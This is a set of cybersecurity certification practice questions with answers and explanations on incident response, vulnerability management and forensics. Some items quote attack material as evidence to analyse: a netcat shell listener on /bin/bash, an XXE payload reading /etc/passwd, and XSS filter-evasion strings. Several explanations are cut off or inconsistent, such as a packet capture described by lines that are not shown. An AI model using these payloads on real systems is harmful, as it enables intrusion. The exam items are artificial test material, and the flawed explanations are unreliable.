Implementing automation for routine tasks Automating routine tasks can help reduce the need for human engagement in security operations. It also allows staff to focus on higher-level tasks that require human judgment. Reducing staff training might lead to more errors and lower efficiency, as staff may not be up to date on the latest trends and threats. Using multiple security platforms can lead to siloed information and an increased need for human engagement to manage and coordinate between the platforms. Limiting access can improve security but might not necessarily reduce the need for human engagement. In fact, it might increase the need for human oversight to manage access control.
You are a security analyst at Dion Training Labs and have noticed an employee logging into the company's secure system from Tokyo, then again from Paris just 30 minutes later. What security alert does this scenario best represent? Impossible Travel AbuseIPDB Pattern Recognition Interpreting Suspicious Commands
Impossible Travel This alert indicates that a user's account has been used to log in from two distant locations within a time frame shorter than the possible travel time between the locations, signaling potential unauthorized access. AbuseIPDB is a tool used to check IP addresses for reported malicious activity; it would not necessarily detect geographically improbable logins based on the information available. Interpreting suspicious commands is a useful skill for identifying potentially malicious actions on a system, but it's not directly related to detecting geographically improbable logins. Pattern recognition involves identifying repeating trends or anomalies in data, which might not directly relate to this specific scenario of geographically improbable logins.
Your organization, a healthcare provider, has just experienced a significant cyber-attack resulting in the compromise of patient records. In response, the organization immediately activates a predefined set of guidelines designed to handle such a situation, which includes procedures for communication, investigation, and mitigation. What term best describes this set of guidelines? Business continuity disaster recovery planning Incident response plan Tabletop exercises Training
Incident response plan The incident response plan outlines the procedures and processes to handle and manage a security incident. It's an essential part of preparation for potential incidents. Tabletop exercises are a method of testing an organization's incident response plan and team, not establishing procedures for managing incidents. While training is an important part of preparation, it involves educating the workforce about potential incidents and how to respond, not outlining procedures for managing potential incidents. Business continuity disaster recovery planning focuses on how an organization can continue operations during and recover after a disruptive incident, not on outlining procedures for handling potential incidents.
The local electric power plant contains both business networks and ICS/SCADA networks to control their equipment. Which technology should the power plant's security administrators look to implement first as part of configuring better defenses for the ICS/SCADA systems? Intrusion prevention system Automated patch deployment Anti-virus software Log consolidation
Intrusion prevention system Since this question is focused on the ICS/SCADA network, the best solution would be implementing an Intrusion Prevention System. ICS/SCADA machines utilize very specific commands to control the equipment, so to prevent malicious activity you could set up strict IPS rules that block unknown types of actions from occurring. Log consolidation is a good idea, but it won't prevent an issue and therefore isn't the most critical thing to add first. Automated patch management should not be conducted, as ICS/SCADA systems must be tested before any patches are applied. Often, patches will break ICS/SCADA functionality. Antivirus software may or may not be able to run on the equipment either, since many ICS/SCADA systems do not rely on standard operating systems like Windows.
What is the significance of root cause analysis in the aftermath of a security incident? It helps in recovering data lost during the incident It provides a basis for communicating with the media It is used for assigning blame for the incident It aids in understanding the factors that led to the incident, helping to prevent occurrences in the future
It aids in understanding the factors that led to the incident, helping to prevent occurrences in the future Root cause analysis is crucial for understanding what caused the incident, enabling organizations to implement measures to prevent similar incidents from happening in the future. The main goal of root cause analysis is not to assign blame, but to understand what led to the incident so that similar issues can be prevented. Root cause analysis does not directly assist in data recovery. It focuses on understanding the cause of the incident. While findings from root cause analysis may be used to inform communications, its primary purpose is not to provide a basis for media interaction.
Your company's cybersecurity team has been tracking vulnerability data over time. What might be the significance of observing a consistent upward trend in the discovery of new vulnerabilities? The company's network bandwidth is being utilized efficiently The company's servers are becoming more efficient It could indicate a need for improved security measures or updated software There is a decreased need for vulnerability scanning
It could indicate a need for improved security measures or updated software An upward trend in vulnerabilities may signal a need to enhance cybersecurity defenses. On the contrary, an upward trend would indicate an increased need for thorough vulnerability scanning. Network bandwidth usage isn't directly related to the trend in vulnerability discoveries. While efficiency is important, an upward trend in vulnerability discoveries is not an indicator of server efficiency.
Your company has noticed a significant increase in the mean time to detect (MTTD) and mean time to respond (MTTR) to incidents. What is a potential impact of these increased metrics? It increases the legal protection against cyber attacks It improves the company's public image It results in a decrease in security alert volume It might lead to a greater impact of security incidents
It might lead to a greater impact of security incidents An increase in MTTD and MTTR suggests a slower reaction to incidents, which can allow threats to cause more damage before they are detected and addressed. These metrics don't provide legal protection. They measure organizational effectiveness in detecting and responding to incidents. MTTD and MTTR metrics don't directly impact the volume of security alerts. They measure the speed of detection and response. Increased MTTD and MTTR are unlikely to improve a company's public image; in fact, they might harm the company's reputation if they result in a significant breach.
John is a cybersecurity consultant that wants to sell his services to an organization. In preparation for his first meeting with the client, John wants to conduct a vulnerability scan of their network to show the client how much they need his services. What is the most significant issue with John conducting this scan of the organization's network? The client's infrastructure design is unknown to John The IP range of the client systems is unknown by John John does not know what operating systems and applications are in use John does not have permission to perform the scan
John does not have permission to perform the scan All options listed are an issue, but the most significant issue is that John does not have the client's permission to perform the scan. A vulnerability scan may be construed as a form of reconnaissance, penetration testing, or even an attack on the organization's systems. A cybersecurity analyst should never conduct a vulnerability scan on another organization's network without explicit written permission. In some countries, a vulnerability scan against an organization's network without their permission is considered a cybercrime and could result in jail time for the consultant.
How could a company's reluctance to interrupt its business processes potentially impact its vulnerability management? Leading to postponed or overlooked system updates and patches Increasing the company's overall market share Enhancing the effectiveness of the company's marketing strategies Boosting employee productivity during work hours
Leading to postponed or overlooked system updates and patches Avoiding interruptions could cause delays or oversights in system maintenance, including the application of important updates and patches. While avoiding interruptions may maintain productivity, it doesn't directly impact vulnerability management. Business process continuity does not have a direct correlation with the effectiveness of marketing strategies. While uninterrupted operations may contribute to business success, this is not directly related to vulnerability management.
You are searching a Linux server for a possible backdoor during a forensic investigation. Which part of the file system should you search for evidence of a backdoor related to a Linux service? /etc/xinetd.conf $HOME/.ssh/ /etc/passwd /etc/shadow
/etc/xinetd.conf Linux services are started by xinetd, but some newer versions use systemctl. Therefore, /etc/xinetd.conf should be analyzed for any evidence of a backdoor being started as part of the Linux services. Both the /etc/passwd and /etc/shadow files contain configurations specifically associated with individual user accounts. The $HOME/.ssh directory contains SSH keys for SSH-based logins.
Your security team is analyzing a recent cyber attack on your organization's network. They want to understand the attacker's behavior, tactics, techniques, and procedures. Which framework is BEST suited for this purpose? Cyber Kill Chain MITRE ATT&CK Diamond Model of Intrusion Analysis OWASP Testing Guide
MITRE ATT&CK The MITRE ATT&CK framework provides a comprehensive matrix of tactics, techniques, and procedures (TTPs) used by attackers, making it a powerful tool for understanding attacker behavior. The Diamond Model focuses on the relationship between the adversary, victim, infrastructure, and capability, rather than the detailed tactics, techniques, and procedures used by the attacker. While the Cyber Kill Chain can provide some insight into an attacker's actions, it primarily describes the linear progression of a cyberattack, not the detailed tactics, techniques, and procedures used. The OWASP Testing Guide is focused on web application security testing, not on understanding attacker behavior.
You are conducting an incident response and want to determine if any account-based indicators of compromise (IoC) exist on a compromised server. Which of the following would you NOT search for on the server? Failed logins Malicious processes Unauthorized sessions Off-hours usage
Malicious processes A malicious process is one that is running on a system and is outside the norm. This is a host-based indicator of compromise (IOC) and not directly associated with an account-based IOC. Off-hours usage, unauthorized sessions, and failed logins are all account-based examples of an IOC. Off-hours usage occurs when an account is observed to log in during periods outside of normal business hours. An attacker often uses this to avoid detection during business hours. Unauthorized sessions occur when a device or service is accessed without authorization, for example, a limited-privilege user signed into a domain controller. A failed login might be normal if a user forgets or incorrectly types their password, but repeated failures for one account could also be an indication of an attempt to crack a user's password.
How can the fear of business process interruption potentially inhibit the remediation of identified vulnerabilities? May lead to delays in performing system maintenance and patching Fear of interruption ensures immediate remediation of all vulnerabilities The potential for interruption incentivizes the enhancement of system functionality Fear of interruption reduces the number of vulnerabilities
May lead to delays in performing system maintenance and patching Interruption concerns may push organizations to delay necessary vulnerability remediation, prolonging system exposure to risks. Fear of interruption does not directly enhance system functionality. Fear of interruption might in fact delay necessary actions, not accelerate them. Fear of interruption does not inherently reduce vulnerabilities; it may delay their remediation.
While monitoring the health of her organization's systems, Lisa notices that a system's processes are using an unusually high amount of memory. What is Lisa checking? Data storage Memory resource management Memory consumption Data encryption
Memory consumption Memory consumption refers to the precise measurement of the quantity of memory that is being actively utilized by the various processes within a system. It serves as a crucial indicator of the system's resource allocation and utilization efficiency. Consequently, when the analyst identifies a discernibly elevated level of memory usage within the system, they are effectively overseeing and scrutinizing the specific aspect of memory consumption. Data encryption, while important for data security, doesn't involve monitoring the amount of memory used by a system's processes. Memory resource management is about efficiently utilizing a system's memory. Data storage is about holding data, not about monitoring the memory usage of a system's processes.
Your organization is preparing for its required quarterly PCI DSS external vulnerability scan. Who is authorized to perform this scan? Only an approved scanning vendor Only employees of the company Any qualified individual Anyone
Only an approved scanning vendor The Payment Card Industry Data Security Standard (PCI DSS) is a prescriptive framework. It is not a law but a formal policy created by the credit card industry that organizations must follow to accept credit and bank cards for payment. Quarterly required external vulnerability scans must be run by a PCI DSS approved scanning vendor (ASV). This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!
During your review of the firewall logs, you notice that an IP address from within your company's server subnet had been transmitting between 125 to 375 megabytes of data to a foreign IP address overnight each day. You have determined this has been occurring for approximately 5 days, and the affected server has since been taken offline for forensic review. Which of the following is MOST likely to increase the impact assessment of the incident? Raw financial information about the company was accessed Forensic review of the server required fallback to a less efficient service PII of company employees and customers was exfiltrated IP addresses and other network-related configurations were exfiltrated
PII of company employees and customers was exfiltrated If the PII (Personally Identifiable Information) of the company's employees or customers were exfiltrated or stolen during the compromise, this would increase the incident's impact assessment. Loss of PII is a big issue for corporations and one that might garner media attention. While all of the options presented here are bad things that could increase the impact of the assessment, loss of PII is considered the MOST likely to increase the impact dramatically. Depending on the company's size or organization, there may also be mandatory reporting requirements, fines, or restitution that must be paid.
You are reverse engineering a piece of malware recovered from a retailer's network for analysis. They found that the malicious code was extracting track data from their customer's credit cards during processing. Which of the following types of threats would you classify this malware as? POS malware Keylogger Ransomware Rootkit
POS malware Point-of-sale malware (POS malware) is a type of malicious software used by cybercriminals to target point-of-sale (POS) and payment terminals with the intent of obtaining credit card and debit card information, such as a card's track 1 or track 2 data and even the CVV code. It does so through various man-in-the-middle techniques, that is, by intercepting the processing at the retail checkout point-of-sale system. Ransomware is a type of malware that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. Keyloggers are a type of monitoring software designed to record keystrokes made by a user. These keyloggers can record the information you type into a website or application and send it back to an attacker. A rootkit is a malware class that modifies system files, often at the kernel level, to conceal its presence.
You're using Burp Suite for web application vulnerability testing but need to extend its functionality. What should be added? Plugins Drivers Scripts APIs
Plugins Plugins are software components that can extend the functionality of Burp Suite, including automated security tasks and additional vulnerability scanning options. While drivers enable hardware-software communication, they do not extend the functionality of Burp Suite. APIs (Application Programming Interfaces) allow different software applications to communicate but do not inherently extend the functionality of a specific tool like plugins. While scripts can automate certain tasks, they do not inherently extend the functionality of a specific tool like plugins.
What type of malware changes its binary pattern in its code on specific dates or times to avoid detection by antimalware software? Logic bomb Polymorphic virus Trojan Ransomware
Polymorphic virus A polymorphic virus alters its binary code to avoid detection by antimalware scanners that rely on signature-based detection. By changing its signature, the virus can avoid detection.
You're examining system logs for potential security incidents when you encounter the following command: nc -lvnp 4444 -e /bin/bash What does this command suggest? Directory Traversal SQL Injection Potential Reverse Shell XSS Attack
Potential Reverse Shell The command represents a potential reverse shell using Netcat (nc). It listens (-l) verbosely (-v) on port 4444 (-p 4444) and executes the /bin/bash shell when a connection is made (-e /bin/bash). Cross-Site Scripting (XSS) involves injecting malicious scripts into trusted websites. This scenario involves shell commands, not web-based script injection. Directory traversal involves navigating through a filesystem and is not represented in this command. SQL injection involves the exploitation of a security vulnerability in an application's database layer. This situation involves shell commands, not SQL statements.
Which term refers to the process of determining which vulnerabilities to address first based on their risk scores, impact, and other factors? Intrusion Detection Patch Distribution Prioritization Firewall Configuration
Prioritization When prioritizing vulnerabilities, several factors come into play. The severity of a vulnerability determines its potential impact, with high-impact vulnerabilities, like those granting system control, given higher priority. The likelihood of exploitation also plays a role, favoring vulnerabilities with higher probabilities, such as publicly disclosed ones. Additionally, the cost of remediation influences prioritization, as expensive fixes may require allocation within the organization's budget. By considering these factors, informed decisions can be made on vulnerability prioritization, leading to benefits such as saved resources, improved security, and compliance with regulations. Ultimately, prioritizing vulnerabilities enhances security posture and reduces the risk of attack. Firewall configuration is the process of setting up a firewall's settings to control network traffic, not the process of deciding which vulnerabilities to address first. Intrusion detection refers to the methods used to detect unauthorized access to a system or network. Patch distribution refers to the process of delivering patches or updates to systems, not determining the order in which vulnerabilities are addressed.
Among the following strategies for dealing with multiple known vulnerabilities, which one is deemed MOST crucial for their successful management and mitigation? The location of vulnerabilities The number of vulnerabilities The type of vulnerabilities Prioritizing the risk level associated with each vulnerability
Prioritizing the risk level associated with each vulnerability Risk prioritization is an essential part of vulnerability management, focusing on the most significant threats in a cybersecurity landscape. It involves assessing potential vulnerabilities, considering their likelihood of exploitation, and the potential impact of such an event. After prioritizing vulnerabilities, the highest-risk ones are addressed first, using methods such as software patching or security policy enhancement. This process is continuously revisited and adjusted as new threats and vulnerabilities emerge. The type of vulnerabilities may provide some context, but it is the risk associated with each that should primarily drive prioritization. The number alone does not give an accurate picture of prioritization. Not all vulnerabilities pose the same level of risk. While knowing where vulnerabilities reside is important, it's not the main factor in prioritization. The risk each vulnerability carries is more critica
Which tool should a malware analyst utilize to track the registry's changes and the file system while running a suspicious executable on a Windows system? DiskMon ProcDump Autoruns Process Monitor
Process Monitor Process Monitor is an advanced monitoring tool for Windows that shows real-time file system, Registry, and process/thread activity. Autoruns shows you what programs are configured to run during system bootup or login. ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. DiskMon is an application that logs and displays all hard disk activity on a Windows system. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!
Which of the following roles should be assigned to the incident response team? (SELECT FOUR) Public relations Legal Human resources Facility maintenance Management Accounting
Public relations Legal Human resources Management Human Resources has a role to play in that the discoveries made during incident handling may affect employees and employment law. Privacy concerns regarding how to intercept and monitor data may also necessitate HR and Legal involvement. For various reasons, the company may decide to go public with the knowledge of the breach. Therefore, public relations personnel are needed. Management has a crucial role to play in being able to allocate resources to remediate the incident. System administrators and security analysts should also be on the team since they know what constitutes a normal baseline for the systems. In general, positions such as facility maintenance and accounting are not required as part of the core incident response team. In special circumstances, though, they may be asked to augment the team. For example, if a breach of a SCADA/ICS system occurs, the facility maintenance employee who operates and services the machine might be a useful addition. Similarly, if a payroll or accounting system was breached, having an accounting department representative could help the response and remediation efforts.
Taylor needs to sanitize hard drives from some leased workstations before returning them to a supplier at the end of the lease period. The workstations' hard drives contained sensitive corporate data. Which is the most appropriate choice to ensure that data exposure doesn't occur during this process? Clear, validate, and document the sanitization of the drives The drives must be destroyed to ensure no data loss Purge, validate, and document the sanitization of the drives Clear the drives
Purge, validate, and document the sanitization of the drives Purging the drives, validating that the purge was effective, and documenting the sanitization is the best response. Purging uses methods that make the information infeasible to recover even in a lab environment. For example, performing a cryptographic erasure (CE) would sanitize and purge the drives' data without harming the drives themselves. Clearing them leaves the possibility that some tools would allow data recovery. Since the scenario indicates that these were leased drives that must be returned at the end of a lease, they cannot be destroyed.
Which party in a federation provides services to members of the federation? SSO IdP RP SAML
RP Relying parties (RPs) provide services to members of a federation. An identity provider (IdP) provides identities, makes assertions about those identities, and releases information about the identity holders. The Security Assertion Markup Language (SAML) is an open standard for exchanging authentication and authorization data between parties, typically between an identity provider and a service provider (SP) or a relying party (RP). Single sign-on (SSO) is an authentication scheme that allows a user to log in with a single ID and password to any of several related yet independent software systems across a federation. SAML and SSO are not parties. Therefore, they cannot possibly be the right answer to this question.
Dion Training wants to require students to log on using multifactor authentication in an effort to increase the security of the authorization and authentication process. Currently, students log in to diontraining.com using a username and password. What proposed solution would best meet the goal of enabling multifactor authentication for the student login process? Require students to choose an image to serve as a secondary password after logon Require students to enter a unique six-digit number that is sent to them by SMS after entering their username and password Require students to enter a cognitive password requirement (such as 'What is your dog's name?') Require students to create a unique pin that is entered after their username and password are accepted
Require students to enter a unique six-digit number that is sent to them by SMS after entering their username and password All of the options presented are knowledge factors (something you know) except the six-digit number sent by SMS to your smartphone. This SMS-sent number is an example of a possession factor, or something you have. In this case, it verifies that you have your smartphone. By combining this possession factor with the knowledge factor already in use (username and password), you can establish multifactor security for the login process.
Your organization has experienced a cyber attack that exploited a zero-day vulnerability. After the incident, what action would provide the MOST valuable insights to prevent similar attacks in the future? Immediate public disclosure of the incident Increased alert volume Root cause analysis Increased frequency of law enforcement communication
Root cause analysis Conducting a root cause analysis can help understand how the vulnerability was exploited, which is key to preventing similar attacks in the future. While transparency is important, immediate public disclosure without a comprehensive understanding of the situation might not prevent future attacks and could even lead to additional issues. Merely increasing the alert volume may not help prevent future attacks. It's more important to understand the nature of the attack and take targeted actions. Communicating with law enforcement might help with the investigation but wouldn't necessarily prevent similar attacks in the future.
After a security incident has been handled, what post-incident activity involves the detailed examination of the incident to identify the primary cause or causes, often using tools to analyze logs, network traffic, and other data? Lessons learned Forensic analysis Incident response plan Root cause analysis
Root cause analysis Root cause analysis is the process of determining the initial cause(s) of a problem or issue, with the intent to fix the issue by addressing these underlying causes. Lessons learned is a process that follows an incident, where all stakeholders reflect on what happened, what was done well, and what needs to be improved for future incidents. It is broader and less technically focused than root cause analysis. The incident response plan is a strategic document outlining the procedures for handling and managing an incident, not a post-incident activity. While forensic analysis also involves a detailed examination of an incident, it typically goes beyond root cause analysis to include a detailed and systematic examination of all aspects of an incident, often with an eye to legal requirements and implications.
Which of the following lists the UEFI boot phases in the proper order? Security, Pre-EFI initialization, Driver Execution Environment, Boot Device Select, Transient System Load, Runtime Pre-EFI initialization, Security, Boot Device Select, Transient System Load, Driver Execution Environment, Runtime Boot Device Select, Security, Pre-EFI initialization, Driver Execution Environment, Transient System Load, Runtime Driver Execution Environment, Boot Device Select, Security, Transient System Load, Pre-EFI initialization, Runtime
Security, Pre-EFI initialization, Driver Execution Environment, Boot Device Select, Transient System Load, Runtime The Security phase must first prevent any potential contamination from advanced malware from affecting the system as it proceeds into its startup process. The Security phase consists of initializing the code that the system executes after powering on the EFI system. Pre-EFI initialization initializes the CPU, temporary memory, and the boot firmware volume (BFV). Driver Execution Environment initializes the entire system's physical memory, I/O, and MMIO (Memory Mapped Input Output) resources. Finally, it begins dispatching the DXE drivers present in the system firmware volumes (given in the HOBL). Boot Device Select interprets the boot configuration data and selects the boot policy for later implementation. Runtime focuses on clearing the UEFI program from memory and transferring control to the operating system.
You are analyzing the logs of a forensic analyst's workstation and see the following:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
root@DionTraining:/home# dd if=/dev/sdc of=/dev/sdb bs=1M count=1000
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What does the bs=1M signify in the command listed above? Sets the beginning sector Sends output to a blank sector Sets the block size Removes error messages and other incorrect data
Sets the block size The dd command is used in forensic data acquisition to create a forensically sound bit-by-bit copy of a hard drive to a disk image. The bs operator sets the block size when using the Linux dd command. This question may seem beyond the scope of the exam. Still, the objectives allow for "other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered" in the objectives' bulleted lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination's content. Therefore, questions like this are fair game on test day. That said, your goal isn't to score 100% on the exam; it is to pass it. Don't let questions like this throw you off on test day. If you aren't sure, take your best guess and move on!
Why is stakeholder identification and communication crucial during an incident response? Stakeholders take on the responsibility of resolving the incident Stakeholders handle communication with the public Stakeholders provide the necessary support and resources for effective incident management Stakeholders analyze the root cause of the incident
Stakeholders provide the necessary support and resources for effective incident management Stakeholders are individuals or groups with a vested interest in the security of an organization. Their support and resources can help effectively manage and mitigate incidents. While stakeholders play a vital role in the incident response process, their main function is not to resolve the incident but to support the incident response team that does. While certain stakeholders may have a role in communicating with the public, it is not their primary responsibility in the incident response process. The task of analyzing the root cause of an incident typically falls to the incident response team or forensic experts, not stakeholders.
An independent cybersecurity researcher has contacted your company to prove a buffer overflow vulnerability exists in one of your applications. Which technique would have been most likely to identify this vulnerability in your application during development? Dynamic code analysis Manual Peer Review Pair programming Static code analysis
Static code analysis Buffer overflows are most easily detected by conducting a static code analysis. Manual peer review or pair programming methodologies might have been able to detect the vulnerability. Still, they do not have the same level of success as a static code analysis using proper tools. A DevSecOps methodology would also improve the likelihood of detecting such an error but still relies on human-to-human interaction and a human understanding of the source code to detect the fault. Dynamic code analysis also may have detected this if the test happened to hit exactly the right condition. Still, again, a static code analysis tool is designed to find buffer overflows more effectively.
A company has recently experienced a data breach and has lost nearly 1 GB of personally identifiable information about its customers. You have been assigned as part of the incident response team to identify how the data was leaked from the network. Your team has conducted an extensive investigation, and so far, the only evidence of a large amount of data leaving the network is from the email server. One user has sent numerous large attachments out of the network to their personal email address. Upon closer inspection, those emails only contain pictures of that user's recent trip to Australia. What is the most likely explanation for how the data left the network? The data was hashed and then emailed to their personal email account The files were downloaded from home while connected to the corporate VPN Steganography was used to hide the leaked data inside the user's photos The data was encrypted and emailed it t
Steganography was used to hide the leaked data inside the user's photos The most likely explanation is that the user utilized steganography to hide the leaked data inside their trip photos. Steganography is the process of hiding one message inside another. By hiding the customer's information within the digital photos, the incident response team would not see the data being hidden without knowing to look for it inside the seemingly benign pictures from the trip. The scenario did not mention whether or not the user connected to the corporate VPN from their home, and the company should log all VPN connections, so this is not the correct answer. Additionally, the user could not hash the data and email it to themselves without losing the information since hashes are a one-way algorithm. Therefore, even if the user had the hash value, they still would not have the customers' personal information. Finally, according to the scenario, the user's email showed no evidence of encrypted files being sent.
Your company was recently the victim of a cross-site scripting attack. The system administrators claim this wasn't possible since they performed input validation using REGEX to alert on any strings that contain the term "[Ss]cript" in them. Which of the following statements concerning this attack is true? An SQL injection must have occurred since their input validation would have prevented The REGEX expression to filter using "[Ss]cript" is insufficient, as an attacker could use SCRIPT or SCRipt or %53CrIPT to evade it The server has insufficient logging and monitoring configured The attacker has modified the logs to cover their tracks and prevent a successful investigation
The REGEX expression to filter using "[Ss]cript" is insufficient, as an attacker could use SCRIPT or SCRipt or %53CrIPT to evade it The most likely explanation is that the REGEX filter was insufficient to eliminate every single possible cross-site scripting attack that could occur. Since cross-site scripting relies on HTML tags to launch, the system administrators had a good idea in creating input validation using a REGEX for those keywords. Unfortunately, they forgot to include a more inclusive version of this REGEX to catch all variants. For example, simply using [Ss][Cc][Rr][Ii][Pp][Tt] would have been much more secure, but even this would miss %53CrIPT, which would evade this filter. To catch all the letter S variants, you would need to use [%53%%73Ss], which includes the capital S in hex code, the lowercase s in hex code, the capital S, and the lowercase s. While it is possible that an attacker used an SQL injection instead, their REGEX input validation would still have allowed a cross-site scripting attack to occur, so this option must be eliminated. As for the logging options, both are possible in the real world, but they do not adequately answer this scenario. The obvious flaw in their input validation is their REGEX filter.
Considering a scenario where an international space station's proprietary operational software is discovered to have numerous zero-day and critical vulnerabilities, why would the unique implications of these specific vulnerabilities in such a high-stakes and isolated environment necessitate an immediate and expedited response? These types of vulnerabilities pose the highest risk to the environment To emphasize the need for higher internet bandwidth Multiple zero-day and critical vulnerabilities imply a need for staff training on new software A large number of zero-day and critical vulnerabilities means that the system is becoming more secure
These types of vulnerabilities pose the highest risk to the environment These vulnerabilities are often exploitable, posing a severe threat to the system, and therefore require immediate remediation efforts. In reality, these vulnerabilities represent significant security risks and should be addressed immediately. While sufficient internet bandwidth is important, the discovery of critical vulnerabilities requires immediate security actions, not bandwidth upgrades. While staff training is a crucial aspect of maintaining a secure environment, the urgent need in this situation is to address the vulnerabilities. A large number of zero-day and critical vulnerabilities does not mean the system is becoming more secure; it means the opposite.
You are an analyst and have been asked to review and categorize the following output from a packet analysis in Wireshark:
Source          Destination     Protocol  Length  Info
192.168.3.145   4.4.2.2         DNS       74      Standard query 0xaed A test.diontraining.com
4.4.2.2         192.168.3.145   DNS       90      Standard query response 0x3aed A test.diontraining.com A 173.12.15.23
192.168.3.145   173.12.15.23    TCP       78      48134 → 80 [SYN] Seq=0 Win=65635 Len=0 MSS=1426 WS=16 TSVal=486234134 TSecr=0 SACK_PERM=1
173.12.15.23    192.168.3.145   TCP       78      80 →
Based on your review, what does this scan indicate? 192.168.3.145 might be infected and beaconing to a C2 server 192.168.3.145 might be infected with malware 173.12.15.23 might be infected and beaconing to a C2 server This appears to be normal network traffic 173.12.15.23 might be infected with malware
This appears to be normal network traffic This appears to be normal network traffic. The first line shows that a DNS lookup was performed for a website (test.diontraining.com). The second line shows the response from the DNS server with the IP address of the website. The third line begins a three-way handshake between an internal host and the website. The fourth line is the SYN-ACK response from the website to the internal host as part of this handshake. The fifth line is a standard Windows NetBIOS query within the local area network to translate human-readable names to local IP addresses. The sixth and seventh lines appear to be inbound requests to port 443 and port 8080, both of which were sent the RST by the internal host's firewall since it is not running those services on the host. None of this network traffic appears to be suspicious.
A cybersecurity analyst notices the following XML transaction while reviewing the communication logs for a public-facing application that receives XML input directly from its clients:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xyz [
<!ELEMENT xyz ANY>
<!ENTITY abc SYSTEM "file:///etc/passwd">
]>
<yada>&abc;</yada>
Based on the output above, which of the following is true? An XML External Entity (XXE) vulnerability has been exploited and it's possible that the attacker has downloaded the file "/etc/passwd". The application is using parameterized queries to prevent XML injections ISO-8859-1 only covers the Latin alphabet and may preclude other languages from being used There is no concern since "/etc/passwd" does not contain any system passwords
An XML External Entity (XXE) vulnerability has been exploited and it's possible that the attacker has downloaded the file "/etc/passwd". This is an example of an XML External Entity (XXE) vulnerability. Any reference to the entity abc in a document of type xyz may now be replaced with the contents of /etc/passwd, which would allow the user to harvest the data contained within the file. Although in modern Linux operating systems /etc/passwd only contains the usernames resident on the system and not the passwords, this is still valuable information for an attacker. The /etc/passwd file has been better secured in recent systems by using a shadow file (which contains the hashed values of the passwords). Unless an input validation step is added to the process, there is nothing to stop the attacker from gathering other potentially sensitive files from the server. While ISO-8859-1 does indeed cover the Latin alphabet and is standard throughout XML, it has no significance from a cybersecurity perspective. A parameterized query is a form of output encoding that defends against SQL and XML injections. This code does not contain a parameterized query.
As part of the preparation phase of the incident management lifecycle, which component involves regularly educating the workforce about potential incidents, how to recognize them, and how to respond? Incident response plan Business continuity disaster recovery planning Training Playbooks
Training Regular training is crucial to equip the workforce with the necessary knowledge to recognize and respond to potential incidents. An incident response plan is a set of procedures to manage and handle an incident. It outlines how the organization will respond to an incident but does not involve the regular education of the workforce. While playbooks provide detailed, step-by-step guides on how to respond to specific types of incidents, they do not involve the regular education of the workforce. While business continuity disaster recovery planning is an essential part of incident management preparation, it does not directly involve workforce education on recognizing and responding to incidents.
A software development company has discovered the ProxyNotShell vulnerability in its product that it cannot fix immediately due to resource constraints. What measures can the company take to mitigate the risk associated with the vulnerability? (Choose TWO) Develop a new software product Use a web application firewall (WAF) to block malicious traffic Use a firewall to restrict access to the affected systems Hire additional developers
Use a web application firewall (WAF) to block malicious traffic Use a firewall to restrict access to the affected systems To mitigate the risk associated with the ProxyNotShell vulnerability, the software development company can configure a Web Application Firewall (WAF) to block traffic related to the vulnerability. By implementing specific rules within the WAF, any malicious traffic attempting to exploit the vulnerability can be identified and blocked, thereby preventing attackers from successfully exploiting the vulnerability. To mitigate the risk associated with the vulnerability, the software development company can configure a firewall to restrict access to the affected systems exclusively for authorized users. By implementing proper firewall rules, the company can control and limit network traffic, preventing unauthorized access and minimizing the potential for attackers to exploit the vulnerability. Creating a new product does not directly address the vulnerability in the existing one. While having more developers might eventually help fix the vulnerability, it does not provide an immediate solution.
Which technique would provide the largest increase in security on a network with ICS, SCADA, or IoT devices? Installation of anti-virus tools Implement endpoint protection platforms Use of a host-based IDS or IPS User and entity behavior analytics
User and entity behavior analytics Since ICS, SCADA, and IoT devices often run proprietary, inaccessible, or unpatchable operating systems, the traditional tools used to detect the presence of malicious cyber activity in normal enterprise networks will not function properly. Therefore, user and entity behavior analytics (UEBA) is best suited to detect and classify known-good behavior from these systems to create a baseline. Once a known-good baseline is established, deviations can be detected and analyzed. UEBA may be heavily dependent on advanced computing techniques like artificial intelligence and machine learning and may have a higher false-positive rate. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and embedded hardware, such as the Internet of Things (IoT) devices. Traditional technologies include anti-virus tools, host-based IDS and IPS, and endpoint protection platforms.
You have been tasked to create some baseline system images to remediate vulnerabilities found in different operating systems. Before any of the images can be deployed, they must be scanned for malware and vulnerabilities. You must ensure the configurations meet industry-standard benchmarks and that the baselining creation process can be repeated frequently. What vulnerability option would BEST create the process requirements to meet the industry-standard benchmarks? Utilizing an operating system SCAP plugin Utilizing a non-credential scan Utilizing an authorized credential scan Utilizing a known malware plugin
Utilizing an operating system SCAP plugin Security Content Automation Protocol (SCAP) is a multi-purpose framework of specifications supporting automated configuration, vulnerability and patch checking, technical control compliance activities, and security measurement. It is an industry standard and supports testing for compliance. The other options will not allow for a truly repeatable process since individual scans would occur each time instead of comparing against a known-good baseline.
